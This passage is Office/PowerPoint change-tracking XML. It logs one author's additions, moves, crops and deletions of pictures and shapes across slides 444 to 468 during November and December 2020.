            <ac:picMk id="3" creationId="{350CE82B-C4CC-48D9-8703-07FAA3E2F68F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9:44.757" v="5745" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3449700447" sldId="444"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:39:44.757" v="5745" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3449700447" sldId="444"/>
            <ac:picMk id="2" creationId="{115CA995-0593-4154-8ACA-B1292864C47F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0:17.507" v="5750" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1713443693" sldId="445"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:40:17.507" v="5750" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1713443693" sldId="445"/>
            <ac:picMk id="2" creationId="{35CC1772-1E4C-4A8A-9005-45C9A61B1D1B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3:35.828" v="5755" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3211985986" sldId="446"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:43:35.828" v="5755" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3211985986" sldId="446"/>
            <ac:picMk id="2" creationId="{B3512220-ABFE-4498-9C30-2C13F2672048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5:39.447" v="5767" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4177250534" sldId="447"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:45:39.447" v="5767" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4177250534" sldId="447"/>
            <ac:picMk id="2" creationId="{961E3ABC-7F70-4AAD-A142-341067E05378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05:32.160" v="5954" actId="732"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4111094813" sldId="448"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:04:26.114" v="5946" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4111094813" sldId="448"/>
            <ac:spMk id="5" creationId="{74560F76-182C-4E06-8C45-6FC2621F4AAA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:49:29.463" v="5806" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4111094813" sldId="448"/>
            <ac:picMk id="2" creationId="{2AE682C2-2760-4E7F-B2C4-E31C22755897}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:02:47.825" v="5914" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4111094813" sldId="448"/>
            <ac:picMk id="3" creationId="{62FD9767-A3D7-4A25-9188-683BBBDEB44D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:02:49.474" v="5915" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4111094813" sldId="448"/>
            <ac:picMk id="4" creationId="{BA75912B-BEDF-443E-8F13-C51DC74EC5F9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:04:21.534" v="5931" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4111094813" sldId="448"/>
            <ac:picMk id="6" creationId="{370168B1-494C-46AA-98B4-E99B2C6BAA4F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:04:57.866" v="5948" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4111094813" sldId="448"/>
            <ac:picMk id="7" creationId="{54D9D0B3-A827-48BC-9FB5-196AEE34A4F9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:05:32.160" v="5954" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4111094813" sldId="448"/>
            <ac:picMk id="8" creationId="{D3E3F18E-1677-486F-87E9-08EB5A37762F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:06:30.528" v="5967" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3629598742" sldId="449"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:06:23.834" v="5963" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3629598742" sldId="449"/>
            <ac:picMk id="2" creationId="{90676D3E-ED38-4EA2-B052-636FC66A74F8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:06:30.528" v="5967" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3629598742" sldId="449"/>
            <ac:picMk id="3" creationId="{21095A26-AC52-43A0-A770-E3E06A5BC569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01:17.387" v="5908" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="315773256" sldId="450"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:01:17.387" v="5908" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="315773256" sldId="450"/>
            <ac:picMk id="2" creationId="{3481E4CE-BAA5-4D25-A7F6-D8B709177497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16:47.560" v="6095" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4217971390" sldId="451"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:16:47.560" v="6095" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4217971390" sldId="451"/>
            <ac:picMk id="2" creationId="{CF3B4B8F-1D2F-4D32-B844-277EAB1AF7AE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32:57.468" v="6228" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3650397043" sldId="452"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:32:57.468" v="6228" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3650397043" sldId="452"/>
            <ac:spMk id="2" creationId="{EBA17CFF-7DCC-4915-A783-B7DC2799F267}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-12-06T11:13:38.880" v="8039" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1600761852" sldId="453"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:45:05.129" v="6253" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="2" creationId="{AF2E6942-FEA9-4933-BA81-EBA8BE806F0A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:45:05.129" v="6253" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="3" creationId="{6F68C340-4F3E-4BD8-9471-DB131BAD0296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6:40.991" v="6264" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3866130153" sldId="454"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:46:40.991" v="6264" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3866130153" sldId="454"/>
            <ac:picMk id="2" creationId="{C3C7EACE-0752-456A-AC79-1D4810127009}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:46:38.053" v="6263" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3866130153" sldId="454"/>
            <ac:picMk id="3" creationId="{D3117732-4B2B-46C2-83D9-3D96B14D86DF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48:18.507" v="6283" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3380740525" sldId="455"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:48:18.507" v="6283" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3380740525" sldId="455"/>
            <ac:picMk id="2" creationId="{47664FA2-ECFB-4CFD-AD13-C31C9455B04B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:47:55.893" v="6274" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3380740525" sldId="455"/>
            <ac:picMk id="3" creationId="{AEB51A27-2A23-4D89-AD41-66DDF1FBB4F9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8:08.934" v="6280" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3681501289" sldId="456"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:48:08.934" v="6280" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681501289" sldId="456"/>
            <ac:picMk id="2" creationId="{E70C91B3-5219-4654-B24C-C90BE84B0FFE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8:56.167" v="6288" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3364176872" sldId="457"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:48:56.167" v="6288" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3364176872" sldId="457"/>
            <ac:picMk id="2" creationId="{87EC6B61-2E3B-40EF-9C20-F1F26F68B28C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50:30.659" v="6303" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="838756640" sldId="458"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:50:30.659" v="6303" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="838756640" sldId="458"/>
            <ac:picMk id="2" creationId="{9C638A45-08AC-465D-A2D5-F17118F3175E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:50:17.194" v="6297" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="838756640" sldId="458"/>
            <ac:picMk id="3" creationId="{ECF4707E-F27D-4F22-9916-A35294FA51C1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50:24.402" v="6302" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1096124257" sldId="459"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:50:24.402" v="6302" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1096124257" sldId="459"/>
            <ac:picMk id="2" creationId="{81A81B13-5517-4721-9F1F-C2AD75ED1FF2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:42:46.844" v="7045" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="781291766" sldId="460"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:52:28.323" v="6404" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="781291766" sldId="460"/>
            <ac:spMk id="3" creationId="{262144AF-35BE-447C-8AC6-60CBF2A52549}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:42:37.500" v="7042" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="781291766" sldId="460"/>
            <ac:picMk id="2" creationId="{AEDF23A6-C01C-4964-9158-6DED00E6482D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:42:46.844" v="7045" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="781291766" sldId="460"/>
            <ac:picMk id="4" creationId="{ED53D162-3479-4162-A982-CD9BAEBB1556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3:38.787" v="7050" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1929560910" sldId="461"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:43:29.787" v="7046" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1929560910" sldId="461"/>
            <ac:picMk id="2" creationId="{1BAC638B-2844-4B2F-992A-F61E3B292C45}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:43:38.787" v="7050" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1929560910" sldId="461"/>
            <ac:picMk id="3" creationId="{D34F4EEE-76D3-41D8-8C4E-6ADD27DFA430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4:22.836" v="7055" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="973399520" sldId="462"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:44:15.568" v="7051" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="973399520" sldId="462"/>
            <ac:picMk id="2" creationId="{8F4AE996-5D65-42F4-A283-BBA5F9256128}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:44:22.836" v="7055" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="973399520" sldId="462"/>
            <ac:picMk id="3" creationId="{624D7551-DA34-480B-A4F5-1E68AD55AB37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5:03.588" v="7060" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3766473943" sldId="463"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:44:55.990" v="7056" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766473943" sldId="463"/>
            <ac:picMk id="2" creationId="{ED3BFEBB-E2B3-4D5F-B5EF-AAA197F35031}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:45:03.588" v="7060" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766473943" sldId="463"/>
            <ac:picMk id="3" creationId="{1EC3401B-D06A-435E-ACD5-364D82349E24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6:04:37.396" v="6433" actId="732"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1537149681" sldId="464"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:04:37.396" v="6433" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1537149681" sldId="464"/>
            <ac:picMk id="2" creationId="{8927D1D4-2AE6-461F-BF64-53DEEB3C2699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16:18:22.359" v="6550"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3216535980" sldId="465"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:11:23.521" v="6459" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3216535980" sldId="465"/>
            <ac:spMk id="2" creationId="{AA4CEF31-2FA4-446E-BDE3-16B51000D493}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:11:23.521" v="6459" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3216535980" sldId="465"/>
            <ac:spMk id="5" creationId="{9BA17791-7925-4C6D-A3FE-D54218C638A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:11:23.521" v="6459" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3216535980" sldId="465"/>
            <ac:picMk id="3" creationId="{C9AF73FD-F97F-4467-B06E-3588EE26CF96}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:12:03.878" v="6465" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3216535980" sldId="465"/>
            <ac:picMk id="6" creationId="{71CE8941-6018-4895-ADC5-30A4C0D44668}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:08:48.546" v="6435" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4085174206" sldId="465"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:18:35.329" v="6553" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="959147364" sldId="466"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:18:35.329" v="6553" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="959147364" sldId="466"/>
            <ac:spMk id="3" creationId="{ECE2ABA2-597C-4BDC-8443-5576268C040E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:18:35.329" v="6553" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="959147364" sldId="466"/>
            <ac:spMk id="6" creationId="{A3814680-6276-43DB-8D4C-325424000F2E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:18:35.329" v="6553" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="959147364" sldId="466"/>
            <ac:picMk id="4" creationId="{9BA59CAE-7C7E-46CF-8FD4-D77440BCA4E1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:18:35.329" v="6553" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="959147364" sldId="466"/>
            <ac:picMk id="7" creationId="{C1C39DE5-0330-4865-AB42-07D3DDC89E27}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme modAnim chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:14:15.733" v="7294" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1829467705" sldId="467"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:21:21.733" v="6712" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1829467705" sldId="467"/>
            <ac:spMk id="2" creationId="{BD8B811F-576E-478C-A2F2-53B1ABB3E99D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:14:15.733" v="7294" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1829467705" sldId="467"/>
            <ac:spMk id="3" creationId="{1863F531-D9BC-4541-B927-79A44E17503A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21T16:51:26.755" v="7282" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="89113158" sldId="468"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:51:26.755" v="7282" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="89113158" sldId="468"/>
            <ac:spMk id="2" creationId="{5B9AB46A-0C10-497F-9D7C-D352809E977E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
